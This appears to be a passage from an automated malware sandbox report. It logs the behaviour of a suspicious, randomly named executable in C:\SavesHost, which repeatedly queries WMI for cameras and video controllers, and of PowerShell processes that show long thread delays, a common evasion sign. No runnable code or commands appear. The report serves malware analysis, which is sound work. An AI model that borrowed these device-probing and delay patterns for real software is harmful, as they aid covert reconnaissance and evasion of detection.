                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\SavesHost\Blockbrowser.exeMemory allocated: D80000 memory reserve | memory write watchJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeMemory allocated: 1A990000 memory reserve | memory write watchJump to behavior
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeMemory allocated: 1200000 memory reserve | memory write watch
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeMemory allocated: 1AD60000 memory reserve | memory write watch
                                    Source: C:\SavesHost\Blockbrowser.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 922337203685477
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 600000
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599875
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599762
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599651
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599547
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599438
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599328
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599216
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 3600000
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599103
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598989
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598860
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598750
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598641
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598516
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598404
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598297
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598187
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598078
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597969
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597860
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597735
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597610
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597485
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597360
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597235
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597123
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597013
